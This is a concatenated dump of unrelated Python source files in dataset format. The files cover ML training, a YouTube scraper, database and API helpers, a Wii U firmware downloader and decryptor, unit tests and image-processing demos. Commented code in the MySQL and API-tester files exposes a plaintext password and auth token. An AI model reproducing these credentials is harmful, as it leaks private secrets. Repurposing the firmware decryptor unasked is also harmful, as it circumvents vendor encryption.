np.mean(lengths)\n std_length = np.std(lengths)\n\n if not exp_cost:\n exp_cost = cost\n exp_length = mean_length\n exp_norm = grad_norm\n else:\n exp_cost = 0.99*exp_cost + 0.01*cost\n exp_length = 0.99*exp_length + 0.01*mean_length\n exp_norm = 0.99*exp_norm + 0.01*grad_norm\n exp_norm = 0.99*exp_norm + 0.01*grad_norm\n\n cost = cost / mean_length\n\n if current_step % FLAGS.print_every == 0:\n logging.info('epoch %d, iter %d, cost %f, exp_cost %f, grad norm %f, param norm %f, tps %f, length mean/std %f/%f' %\n (epoch, current_step, cost, exp_cost / exp_length, grad_norm, param_norm, tps, mean_length, std_length))\n epoch_toc = time.time()\n\n ## Checkpoint\n checkpoint_path = os.path.join(FLAGS.train_dir, \"best.ckpt\")\n\n ## Validate\n valid_cost = validate(model, sess, cur_len)\n\n logging.info(\"Epoch %d Validation cost: %f time: %f\" % (epoch, valid_cost, epoch_toc - epoch_tic))\n\n\n if len(previous_losses) > 2 and valid_cost > previous_losses[-1]:\n logging.info(\"Annealing learning rate by %f\" % FLAGS.learning_rate_decay_factor)\n sess.run(model.lr_decay_op)\n model.saver.restore(sess, checkpoint_path + (\"-%d\" % best_epoch))\n else:\n previous_losses.append(valid_cost)\n best_epoch = epoch\n model.saver.save(sess, checkpoint_path, global_step=epoch)\n sys.stdout.flush()\n\n\ndef main(_):\n train()\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"588902091","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport youtube_driver.get_authenticated as GetAuthenticated\nimport youtube_driver.get_comments as GetComments\nimport youtube_driver.get_images as GetImages\nimport time\n\t\t\nimport sys\nimport click\n\n@click.command()\n@click.option('--keys', '-k', multiple=True, default=[], help='A list of video names that we are searching.')\n\ndef main(keys):\n\n ''' \n Scraping conversations in youtube based on the video names.\n '''\n\n keys = list(keys)\n file_pos = 0\n if (len(keys) > 0): # If code_secret_file_name and keys are specified.\n click.echo('reading from arguments')\n getAuthenticated = GetAuthenticated.GetAuthenticated(file_pos) # Read authentification informations from code_secret_file\n youtube, file_num = getAuthenticated.get_authenticated()\n for key in keys: \n # Start searching for the video.\n while(file_pos < file_num):\n try:\n request = youtube.search().list(\n part=\"snippet\",\n maxResults=25,\n q=str(key)\n )\n response = request.execute()\n break\n except:\n file_pos += 1\n getAuthenticated = GetAuthenticated.GetAuthenticated(file_pos) # Read authentification informations from code_secret_file\n youtube, file_num = getAuthenticated.get_authenticated()\n pass\n while(response):\n time.sleep(1)\n for (index,item) in enumerate(response['items']):\n while(file_pos < file_num):\n try:\n try:\n videoId = str(item['id']['videoId']) # Get the video id.\n except:\n continue\n # Start scraping the video comments.\n request2 = youtube.commentThreads().list(\n part=\"snippet,replies\",\n videoId=str(videoId)\n )\n try:\n response2 = request2.execute()\n except: # The video is private.\n continue\n\n getComments = GetComments.GetComments(response2, youtube)\n getComments.get_comments()\n break\n except:\n file_pos += 1\n getAuthenticated = GetAuthenticated.GetAuthenticated(file_pos) # Read authentification informations from code_secret_file\n youtube, file_num = getAuthenticated.get_authenticated()\n pass\n\n if(len(keys) == 0):\n click.echo('Missing key')\t\n\n\t\t","sub_path":"Scraping/Scraping_YouTube/youtube_driver/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232743688","text":"import gensim\n\nclass Sentence(object):\n def __init__(self, inputStr):\n self.Fname = inputStr\n\n def __iter__(self):\n inputFile = open(self.Fname, mode=\"r\", encoding=\"UTF-8\")\n for line in inputFile:\n line = line.strip().replace(\" \", \"\")\n wordList = [word for word in line]\n yield wordList\n\n\nMysentence = Sentence(\"data/train.txt\")\nprint(\"hhhh\")\nmodel=gensim.models.Word2Vec(Mysentence, size=100, window=5, min_count=1, iter=10, workers=4)\nmodel.save(\"word2vec\")\nprint(\"hhhh\")\nprint(model[\"我\"])","sub_path":"word2vector/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462427706","text":"import mysql.connector\nimport datetime\n\n\nclass Set_Mysql():\n def __init__(self,_id,_title,_class,_content , _conn , _db):\n self._id = _id\n self._title = _title\n self._class = _class\n self._content = _content\n self._conn = _conn\n self._db = _db\n def Connect_To_Sql(self):\n self._mycursor = self._conn.cursor()\n self._mycursor.execute('use ' + str(self._db))\n def prevent_duplicate(self):\n title_data = (self._title,)\n sql = \"select * from mangerdb_item where title = %s\"\n self._mycursor.execute(sql, title_data)\n myresult = self._mycursor.fetchall()\n if myresult:\n print('重複的資料', 'id', id, '標題', title_data[0])\n else:\n try:\n insert_sql = \"insert ignore into mangerdb_item (id , title ,Myclass , content) values (%s,%s,%s,%s)\"\n insert_data = (self._id, self._title, self._class, self._content)\n self._mycursor.execute(insert_sql, insert_data)\n self._conn.commit()\n except mysql.connector.Error as error:\n self._conn.rollback()\n finally:\n if self._mycursor.rowcount:\n print(\"資料成功輸入\")\n else:\n time_id = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n insert_data = (self._id, self._title, self._class, self._content)\n self._mycursor.execute(insert_sql, insert_data)\n self._conn.commit()\n print(self._mycursor.rowcount, \"record inserted.\", \"id改為時間參數\")\n\n\n# mydb = mysql.connector.connect(\n# user='root',\n# passwd='April29love',\n# host='localhost',\n# database='test ',\n# )\n#\n# mycursor = mydb.cursor()\n# mycursor.execute('use mangerdb')\n#\n# def prevent_duplicate(id,title,MyClass,content):\n# # test_id = (id,)\n# test_title = (title,)\n#\n# print(\"title\" , test_title)\n#\n# sql = \"select * from mangerdb_item where title = %s\"\n# mycursor.execute(sql,test_title)\n# myresult = mycursor.fetchall()\n# if myresult:\n# print('重複的資料','id',id,'標題',test_title[0])\n# else:\n# try:\n# insert_sql = \"insert ignore into mangerdb_item (id , title ,Myclass , content) values (%s,%s,%s,%s)\"\n# insert_data = (id,title,MyClass,content)\n# mycursor.execute(insert_sql,insert_data)\n# mydb.commit()\n# except mysql.connector.Error as error:\n# mydb.rollback()\n# finally:\n# if mycursor.rowcount:\n# print(\"資料成功輸入\")\n# else:\n# time_id = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n# insert_data = (time_id, title, MyClass, content)\n# mycursor.execute(insert_sql, insert_data)\n# mydb.commit()\n# print(mycursor.rowcount, \"record inserted.\", \"id改為時間參數\")\n#\n","sub_path":"0927_KFC_crawl/insert_mysql.py","file_name":"insert_mysql.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90127847","text":"import requests\nimport json\nfrom pprint import pprint\n\n\ndef request(method, url, data, token, is_urlencoded=True):\n method = method.upper()\n if method not in ('GET', 'POST'):\n raise Exception('올바른 형식을 입력해 주세요')\n if method == 'GET':\n headers = {'Content-Type': 'application/json'}\n if token != '':\n headers['Authorization'] = f'Token {token}'\n res = requests.get(url=url, params=data, headers=headers)\n elif method == 'POST':\n headers = {}\n if token != '':\n headers['Authorization'] = f'Token {token}'\n if is_urlencoded is True:\n headers['Content-Type'] = 'application/x-www-form-urlencoded'\n res = requests.post(\n url=url, data=json.dumps(data), headers=headers)\n else:\n headers['Content-Type'] = 'application/json'\n res = requests.post(\n url=url, data=json.dumps(data), headers=headers)\n\n dict_meta = {'status_code': res.status_code, 'ok': res.ok,\n 'encoding': res.encoding, 'Content-Type': res.headers['Content-Type']}\n if 'json' in str(res.headers['Content-Type']):\n return {**dict_meta, **res.json()}\n else:\n return {**dict_meta, **{'text': res.text}}\n\n\nhost = 'http://localhost:8000'\n\n# GET으로 포스트 가져오기\nroute_get = \"/api/posts\"\nget_url = host + route_get\nres = request(method='GET', url=get_url, data={'': ''}, token='')\nif res['ok'] == True:\n pprint(res)\nelse:\n print('오류')\n\n# # POST로 로그인하기\n# route_post = \"/api/auth/login/\"\n# post_url = host + route_post\n# data = {'username': 'ydh2244', 'password': '1127star'}\n# res = request(method='POST', url=post_url, data=data, token='')\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# print('오류')\n\n# # post 보내기 + 토큰\n# route_post = \"/api/posts/\"\n# post_url = host + route_post\n# data = {\n# \"category\": \"board\",\n# \"content\": \"안녕하세요\",\n# \"title\": \"안녕하세요\",\n# \"username\": \"염동환\",\n# \"profileid\": 1\n# }\n# token = 'd9f37c894c1ae9d18084249c367dd640e4ff4968e5f65f0d2473a61281610ff4'\n# res = request(method='POST', url=post_url, data=data,\n# token=token, is_urlencoded=False)\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# print('오류')\n\n# # user 로그인 체크하기\n# route_post = \"/api/auth/user/\"\n# post_url = host + route_post\n# data = {'username': 'ydh2244', 'password': '1127star'}\n# token = 'd9f37c894c1ae9d18084249c367dd640e4ff4968e5f65f0d2473a61281610ff4'\n# res = request(method='GET', url=post_url, data=data, token=token)\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# pass\n# route_post = \"/api/auth/login/\"\n# post_url = host + route_post\n# data = {'username': 'ydh2244', 'password': '1127star'}\n# res = request(method='POST', url=post_url, data=data, token='')\n# if res['ok'] == True:\n# pprint(res)\n# else:\n# print('오류')\n","sub_path":"카카오연습용 프론트/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591017307","text":"#! /usr/bin/python\n# -*- encoding: utf-8 -*-\n# @Author: DZF\nimport hashlib\nimport hmac\nimport time\nfrom collections import OrderedDict\nfrom urllib.parse import urlencode\nimport accountConfig\nimport urllib\nimport urllib.parse\nimport urllib.request\n\nimport requests\n\n# Nonce Length\nJUBI_NONCE_LENGHT = 12\n\nACCESS_KEY = accountConfig.JUBI[\"CNY_1\"][\"ACCESS_KEY\"]\nSECRET_KEY = accountConfig.JUBI[\"CNY_1\"][\"SECRET_KEY\"]\nSERVICE_API = accountConfig.JUBI[\"CNY_1\"][\"SERVICE_API\"]\n\n\ndef getMd5Hash(s):\n m = hashlib.md5()\n m.update(s)\n return m.hexdigest()\n\ndef generate_signature(msg, private_key):\n msg = msg.encode(encoding='UTF8')\n k = getMd5Hash(private_key.encode(encoding='UTF8')).encode(encoding='UTF8')\n signature = hmac.new(k, msg, digestmod=hashlib.sha256).hexdigest()\n return signature\n\n\ndef reformat_params(params, private_key):\n orderDict = OrderedDict(params)\n param_str = urlencode(orderDict)\n #param_str = '&'.join(['%s=%s' % (str(k), str(v)) for (k, v) in orderDict.items()])\n signature = generate_signature(param_str, private_key)\n orderDict['signature'] = signature\n return orderDict\n\n\ndef get2api(pParams, method):\n request_url = SERVICE_API + method\n return httpGet(request_url, pParams)\n\n\ndef send2api(pParams, method):\n pParams['key'] = ACCESS_KEY\n pParams['nonce'] = int(time.time() * 1000)\n pParams = reformat_params(pParams, SECRET_KEY)\n request_url = SERVICE_API + method\n print(pParams)\n # if (extra):\n # for k in extra:\n # v = extra.get(k)\n # if (v != None):\n # pParams[k] = v\n # pParams.update(extra)\n return httpRequest(request_url, pParams)\n\n\n'''\n生成签名\n'''\n\n\ndef createSign(params):\n params['secret_key'] = SECRET_KEY\n params = sorted(params.items(), key=lambda d: d[0], reverse=False)\n message = urllib.parse.urlencode(params)\n message = message.encode(encoding='UTF8')\n m = hashlib.md5()\n m.update(message)\n m.digest()\n sig = m.hexdigest()\n return sig\n\n\ndef httpGet(url, params):\n print(url)\n headers = {\n \"Content-type\": \"application/x-www-form-urlencoded\",\n }\n\n postdata = urllib.parse.urlencode(params)\n # postdata = postdata.encode('utf-8')\n response = requests.get(url, postdata, headers=headers, timeout=20)\n if response.status_code == 200:\n return response.json()\n else:\n print(response.status_code)\n\n raise Exception(\"httpPost failed, detail is:%s\" % response.text)\n\n'''\nrequest\n'''\n\n\ndef httpRequest(url, params):\n print(url)\n '''\n postdata = urllib.parse.urlencode(params)\n postdata = postdata.encode('utf-8')\n\n fp = urllib.request.urlopen(url, postdata, timeout = 20)\n if fp.status != 200:\n return None\n else:\n mybytes = fp.read()\n mystr = mybytes.decode(\"utf8\")\n fp.close()\n return mystr\n '''\n headers = {\n \"Content-type\": \"application/x-www-form-urlencoded\",\n }\n\n postdata = urllib.parse.urlencode(params)\n # postdata = postdata.encode('utf-8')\n response = requests.post(url, postdata, headers=headers, timeout=20)\n if response.status_code == 200:\n return response.json()\n else:\n print(response.status_code)\n\n raise Exception(\"httpPost failed, detail is:%s\" % response.text)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"exchangeConnection/jubi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480534773","text":"#!/usr/bin/python\n\n# insert keys here, your keys were set correctly if the crc32 of the fw.img\n# is d674201b and the crc32 of the fw.img.full.bin is 9f2c91ff in the end\nwiiu_common_key = \"you have to insert this yourself\"\nstarbuck_ancast_key = \"you have to insert this yourself\"\nstarbuck_ancast_iv = \"you have to insert this yourself\"\n\n# Don't edit past here\n\nimport os, sys, zlib\nimport codecs\nfrom Crypto.Cipher import AES\n\ntry:\n from urllib.request import urlopen\nexcept ImportError:\n from urllib2 import urlopen\n\nprint(\"somewhat simple 5.5.1 fw.img downloader\")\n\n#prepare keys\nwiiu_common_key = codecs.decode(wiiu_common_key, 'hex')\nstarbuck_ancast_key = codecs.decode(starbuck_ancast_key, 'hex')\nstarbuck_ancast_iv = codecs.decode(starbuck_ancast_iv, 'hex')\n\nif zlib.crc32(wiiu_common_key) & 0xffffffff != 0x7a2160de:\n print(\"wiiu_common_key is wrong\")\n sys.exit(1)\n\nif zlib.crc32(starbuck_ancast_key) & 0xffffffff != 0xe6e36a34:\n print(\"starbuck_ancast_key is wrong\")\n sys.exit(1)\n\nif zlib.crc32(starbuck_ancast_iv) & 0xffffffff != 0xb3f79023:\n print(\"starbuck_ancast_iv is wrong\")\n sys.exit(1)\n\n\nprint(\"downloading osv10 cetk\")\n\n#download osv10 cetk\nf = urlopen(\"http://ccs.cdn.wup.shop.nintendo.net/ccs/download/000500101000400A/cetk\")\nd = f.read()\nif not d:\n print(\"cetk download failed!\")\n sys.exit(2)\n\n#get cetk encrypted key\nenc_key = d[0x1BF:0x1BF + 0x10]\n\n#decrypt cetk key using wiiu common key\niv = codecs.decode(\"000500101000400A0000000000000000\", 'hex')\ncipher = AES.new(wiiu_common_key, AES.MODE_CBC,iv)\ndec_key = cipher.decrypt(enc_key)\n\nprint(\"downloading fw.img\")\n#download encrypted 5.5.1 fw img\n\nf = urlopen(\"http://ccs.cdn.wup.shop.nintendo.net/ccs/download/000500101000400A/0000136e\")\nif not f:\n print(\"0000136e download failed!\")\n sys.exit(2)\n\nprint(\"decrypt first\")\n#decrypt fw img with our decrypted key\nbuffer = \"\"\n\nwith open(\"fw.img\",\"wb\") as fout:\n iv = codecs.decode(\"00090000000000000000000000000000\", \"hex\")\n cipher = AES.new(dec_key, AES.MODE_CBC, iv)\n\n while True:\n dec = f.read(0x4000)\n if len(dec) < 0x10:\n break\n enc = cipher.decrypt(dec)\n fout.write(enc)\n\nwith open('fw.img', 'rb') as f:\n if (zlib.crc32(f.read()) & 0xffffffff) != 0xd674201b:\n print(\"fw.img is corrupt, try again\")\n sys.exit(2)\n\nprint(\"decrypt second\")\n#decrypt ancast image with ancast key and iv\nwith open(\"fw.img\", \"rb\") as f:\n with open(\"fw.img.full.bin\",\"wb\") as fout:\n fout.write(f.read(0x200))\n cipher = AES.new(starbuck_ancast_key, AES.MODE_CBC, starbuck_ancast_iv)\n while True:\n dec = f.read(0x4000)\n if len(dec) < 0x10:\n break\n enc = cipher.decrypt(dec)\n fout.write(enc)\n\nwith open('fw.img.full.bin', 'rb') as f:\n if (zlib.crc32(f.read()) & 0xffffffff) != 0x9f2c91ff:\n print(\"fw.img.full.bin is corrupt, try again with better keys\")\n sys.exit(2)\n\nprint(\"done!\")\n","sub_path":"bin/getfwimg.py","file_name":"getfwimg.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559885513","text":"import unittest\nimport sys\nimport os\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '../Class'))\nfrom Class.Carte import Carte\n\nclass CarteTest(unittest.TestCase):\n\n\t\"\"\"\n\tTest la class Carte de Carte.py\n\t\"\"\"\n\tdef setUp(self):\n\t\t\"\"\"setup le test set\"\"\"\n\t\tself.test = {\n\t\t\t\"zeroNl\" : \"OOOOOO\",\n\t\t\t\"sixNl\" : \"\\n\\n\\n\\n\\n\",\n\t\t\t\"fullmap\" :\n\t\t\t\t\"OOOOOOOO\\n\"\n\t\t\t\t\"O UO\\n\"\n\t\t\t\t\"OOOOOOOO\",\n\t\t\t\"fullmapDoor\" :\n\t\t\t\t\"OOOOOOOO\\n\"\n\t\t\t\t\"O . UO\\n\"\n\t\t\t\t\"OOOOOOOO\"\n\t\t}\n\n\t\tself.maze = {}\n\t\tfor key, val in self.test.items():\n\t\t\tself.maze[key] = Carte(key, val)\n\n\tdef testConvStrDic(self):\n\t\t\"\"\"\n\t\tVerifier si la conversion de la chaine vers un dic et bien faite\n\t\t\"\"\"\n\t\tzeroNl = {\n\t\t\t(1, 1) : \"O\",\n\t\t\t(1, 2) : \"O\",\n\t\t\t(1, 3) : \"O\",\n\t\t\t(1, 4) : \"O\",\n\t\t\t(1, 5) : \"O\",\n\t\t\t(1, 6) : \"O\"\n\t\t}\n\t\tsixNl = {\n\t\t\t(1, 1) : \"\\n\",\n\t\t\t(2, 1) : \"\\n\",\n\t\t\t(3, 1) : \"\\n\",\n\t\t\t(4, 1) : \"\\n\",\n\t\t\t(5, 1) : \"\\n\"\n\t\t}\n\t\tfullmap = {\n\t\t\t(1, 1) : \"O\", (2, 1) : \"O\", (3, 1) : \"O\",\n\t\t\t(1, 2) : \"O\", (2, 2) : \" \", (3, 2) : \"O\",\n\t\t\t(1, 3) : \"O\", (2, 3) : \" \", (3, 3) : \"O\",\n\t\t\t(1, 4) : \"O\", (2, 4) : \" \", (3, 4) : \"O\",\n\t\t\t(1, 5) : \"O\", (2, 5) : \" \", (3, 5) : \"O\",\n\t\t\t(1, 6) : \"O\", (2, 6) : \" \", (3, 6) : \"O\",\n\t\t\t(1, 7) : \"O\", (2, 7) : \"U\", (3, 7) : \"O\",\n\t\t\t(1, 8) : \"O\", (2, 8) : \"O\", (3, 8) : \"O\",\n\t\t\t(1, 9) : \"\\n\", (2, 9) : \"\\n\"\n\t\t}\n\t\tself.assertEqual(self.maze[\"zeroNl\"].labyrinthe, zeroNl)\n\t\tself.assertEqual(self.maze[\"sixNl\"].labyrinthe, sixNl)\n\t\tself.assertEqual(self.maze[\"fullmap\"].labyrinthe, fullmap)\n\n\tdef testPickRandomLocation(self):\n\t\t\"\"\"\n\t\tTest la methode pour obtenir une coordonnée libre\n\t\t\"\"\"\n\t\tcoordZero = self.maze[\"zeroNl\"].pickRandomLocation()\n\t\tcoordfive = self.maze[\"sixNl\"].pickRandomLocation()\n\t\tcoordfull = self.maze[\"fullmap\"].pickRandomLocation()\n\n\t\t# vu que les 2 premier map n'ont pas deplacement libre\n\t\t# les coordonnée renvoie doivent etre null\n\t\tself.assertIsNone(coordZero)\n\t\tself.assertIsNone(coordfive)\n\t\t# on verifie si les coordonnée sont bien register dans le dictionnaire\n\t\tself.assertIn(coordfull, self.maze[\"fullmap\"].labyrinthe)\n\t\t# puis si la val qui se trouve a la key est bien un espace vide\n\t\tself.assertEqual(self.maze[\"fullmap\"].labyrinthe[coordfull], \" \")\n\n\tdef test__str__(self):\n\t\t\"\"\"\n\t\tTest la methode __str__\n\t\t\"\"\"\n\t\tfor key, val in self.test.items():\n\t\t\tso = \"test : \" + val\n\t\t\tsv = \"test : \" + self.maze[key].__str__()\n\t\t\tself.assertEqual(sv, so)\n\n\tdef test__repr__(self):\n\t\t\"\"\"\n\t\tTest la methode __repr__\n\t\t\"\"\"\n\t\tfor key, val in self.maze.items():\n\t\t\tso = \"\"\n\t\t\tself.assertEqual(so, val.__repr__())\n\n\tdef testRobotCanMove(self):\n\t\t\"\"\"\n\t\tverifie la methode robotCanMove\n\t\t\"\"\"\n\t\tfullmap = self.maze[\"fullmap\"]\n\t\tcoord1 = (2, 1)\n\t\tcoord2 = (2, 2)\n\t\tcoord3 = (1, 4)\n\t\t# test toute les directions\n\t\t# les coord1 et 3 sont toujours fausse\n\t\tfor l in \"nsew\":\n\t\t\tself.assertFalse(fullmap.actionOk(coord1, l, l, 1))\n\t\t\tself.assertFalse(fullmap.actionOk(coord3, l, l, 1))\n\n\t\t# pour la coord2 le robot peut seulement se deplacer a l'est\n\t\t# sur 6 case en content celle de depart\n\t\tself.assertFalse(fullmap.actionOk(coord2, \"n\", \"n\", 1))\n\t\tself.assertFalse(fullmap.actionOk(coord2, \"s\", \"s\", 1))\n\t\tself.assertFalse(fullmap.actionOk(coord2, \"o\", \"o\", 1))\n\n\t\tself.assertTrue(fullmap.actionOk(coord2, \"e\", \"e\", 1))\n\t\tself.assertTrue(fullmap.actionOk(coord2, \"e\", \"e\", 5))\n\n\tdef testRobotCanWork(self):\n\t\t\"\"\"\n\t\tverifie la methode robotCanWork\n\t\t\"\"\"\n\t\tfullmapDoor = self.maze[\"fullmapDoor\"]\n\t\tcoord = (2, 2)\n\t\t# test la methode murer\n\t\t# le nord, sud, ouest correspond a des murs sur la map\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"m\", \"n\"))\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"m\", \"s\"))\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"m\", \"o\"))\n\t\t# la porte se trouve a l'est du robot\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"m\", \"e\"))\n\n\t\t# le nord, sud, ouest correspond a des murs sur la map\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"p\", \"n\"))\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"p\", \"s\"))\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"p\", \"o\"))\n\t\t# la porte se trouve a l'est du robot\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"p\", \"e\"))\n\n\tdef testBuildWall(self):\n\t\t\"\"\"\n\t\tverifie la methode testBuildWall\n\t\t\"\"\"\n\t\tfullmapDoor = self.maze[\"fullmapDoor\"]\n\t\t# on choisi une coordone contenent un mur\n\t\tcoord = (2, 3)\n\t\tres = \"OOOOOOOO\\nO O UO\\nOOOOOOOO\"\n\n\t\t# la fonction renvoie true si elle a placer un mur\n\t\tself.assertTrue(fullmapDoor.buildWall(coord))\n\t\t# si le mur est bien placer alors la map a du changer\n\t\tself.assertEqual(fullmapDoor.__str__(), res)\n\n\t\t# sinon elle renvoie false si il ne s'agit pas d'une porte\n\t\tself.assertFalse(fullmapDoor.buildWall(coord))\n\t\tself.assertEqual(fullmapDoor.__str__(), res)\n\n\tdef testBuildDoor(self):\n\t\t\"\"\"\n\t\tverifie la methode testBuildDoor\n\t\t\"\"\"\n\t\tfullmapDoor = self.maze[\"fullmapDoor\"]\n\t\tres = \"O.OOOOOO\\n. . UO\\nO.OOOOOO\"\n\t\tlst = [(1, 2), (2, 1), (3, 2)]\n\n\t\t# la fonction renvoie true si elle a placer une porte\n\t\tfor l in lst:\n\t\t\tself.assertTrue(fullmapDoor.buildDoor(l))\n\n\t\t# sinon elle renvoie false si il ne s'agit pas d'un mur\n\t\tself.assertFalse(fullmapDoor.buildDoor((2, 2)))\n\t\tself.assertFalse(fullmapDoor.buildDoor((2, 3)))\n\t\tself.assertEqual(fullmapDoor.__str__(), res)\n\n","sub_path":"activity/labyrinthe_2/test/test_carte.py","file_name":"test_carte.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"98983999","text":"from flask_restx import Resource\nfrom opentera.services.ServiceAccessManager import ServiceAccessManager, current_login_type, current_device_client, \\\n current_participant_client, current_user_client, LoginType\nfrom services.BureauActif.FlaskModule import default_api_ns as api\n\n\nclass QueryAccountInfos(Resource):\n\n def __init__(self, _api, *args, **kwargs):\n Resource.__init__(self, _api, *args, **kwargs)\n self.module = kwargs.get('flaskModule', None)\n\n @api.doc(description='Gets current login type: device, participant or user and associated informations',\n responses={200: 'Success'})\n @ServiceAccessManager.token_required\n def get(self):\n account_infos = {\n 'login_type': 'unknown',\n 'login_id': 0,\n 'is_super_admin': False,\n 'username': 'unknown'\n }\n\n if current_login_type == LoginType.DEVICE_LOGIN:\n account_infos['login_type'] = 'device'\n account_infos['login_id'] = current_device_client.id_device\n\n if current_login_type == LoginType.PARTICIPANT_LOGIN:\n participant = current_participant_client.get_participant_infos()\n account_infos['login_type'] = 'participant'\n account_infos['login_id'] = current_participant_client.id_participant\n account_infos['username'] = participant['participant_username']\n\n if current_login_type == LoginType.USER_LOGIN:\n user = current_user_client.get_user_info()\n account_infos['login_type'] = 'user'\n account_infos['login_id'] = current_user_client.id_user\n account_infos['is_super_admin'] = current_user_client.user_superadmin\n account_infos['username'] = user[0]['user_username']\n account_infos.update({'sites': user[0]['sites']})\n\n return account_infos\n\n","sub_path":"teraserver/python/services/BureauActif/API/QueryAccountInfos.py","file_name":"QueryAccountInfos.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"3171357","text":"#calcular el area de un cuadrado\narea,lado=0,0\n\n#asignacion de valores\nlado=18\n\n#calculo\narea=lado*lado\n\n#mostrar valores\nprint(\"el lado es:\",lado)\nprint(\"el area es:\",area)\n","sub_path":"ejercicio10.py","file_name":"ejercicio10.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"316321867","text":"color_list = [\"red\", \"blue\", \"yellow\", \"teal\"]\nprint(\"* \" * 10)\ncommand = input(\"What's your commnad (add, remove, draw)?\")\nwhile True:\n if command == \"remove\":\n\n print(\"old color:\")\n color_to_remove = input(\"color_to_remove?\")\n color_list.remove(color_to_remove)\n\n\n elif command == \"add\":\n\n color_to_append = input(\"color_to_append?\")\n color_list.append(color_to_append)\n\n\n elif command == \"draw\":\n\n from turtle import*\n shape(\"turtle\")\n hideturtle()\n penup()\n for c in color_list:\n fillcolor(c)\n stamp()\n forward(20)\n left(30)\n mainloop()\n\n\n for c in color_list:\n print(c)\n print(\"* \" * 10)","sub_path":"list_remove.py","file_name":"list_remove.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"630968211","text":"import os\nfrom setuptools import setup, find_packages\n\ndef read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n\tname = \"wind\",\n\tversion = \"0.0.1\",\n\tauthor = \"Trevor F. Smith\",\n\tauthor_email = \"subs@trevor.smith.name\",\n\tdescription = \"A WebSocket event system for Django.\",\n\tlicense = \"apache2.0\",\n\tkeywords = \"django websockets events python\",\n\turl = \"https://github.com/TrevorFSmith/wind\",\n\tpackages = find_packages(\n\t\texclude=[]\n\t),\n\tinclude_package_data = True,\n\tlong_description=read('README.md'),\n\tclassifiers=[\n\t\t\"Development Status :: 3 - Alpha\",\n\t\t\"Topic :: Utilities\",\n\t\t\"License :: OSI Approved :: Apache 2.0\",\n\t],\n\tscripts = [],\n\tinstall_requires=['django','south','django-piston', 'gevent-websocket'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198708912","text":"# Morphological transformations are normally performed on binary images\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv.imread('images/smarties.png', cv.IMREAD_GRAYSCALE)\n_, mask = cv.threshold(img, 220, 255, cv.THRESH_BINARY_INV)\n# kernal = np.ones((2,2) , np.uint8)\nkernal = np.ones((3,3) , np.uint8)\nprint(kernal)\ndilation = cv.dilate(mask, kernal, iterations=2)\nerosion = cv.erode(mask, kernal, iterations=1)\nopening = cv.morphologyEx(mask, cv.MORPH_OPEN, kernal)\nclosing = cv.morphologyEx(mask, cv.MORPH_CLOSE, kernal)\n\n\ntitle = ['image', 'mask', 'dialation', 'erosion', 'opening', 'closing']\nimages = [img, mask, dilation, erosion, opening, closing]\n\nfor i in range(len(title)):\n plt.subplot(2, 3, i+1), plt.imshow(images[i], 'gray')\n plt.title(title[i])\n plt.xticks([]), plt.yticks([])\n\nplt.show()","sub_path":"OpenCv/openCv Practical/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"415354473","text":"\"\"\"\nThese are helpers specifically for the file readers for private use only.\n@author: Bane Sullivan\n\"\"\"\n__all__ = [\n 'getVTKtype',\n 'converStringArray',\n 'ConvertArray',\n 'placeArrInTable',\n 'getdTypes',\n 'cleanDataNm',\n 'createModifiedCallback',\n]\n\nimport numpy as np\nfrom vtk.util import numpy_support as nps\nimport vtk\nimport os\nfrom . import errors as _helpers\nfrom .arrays import numToVTK\n\ndef getVTKtype(typ):\n \"\"\"This looks 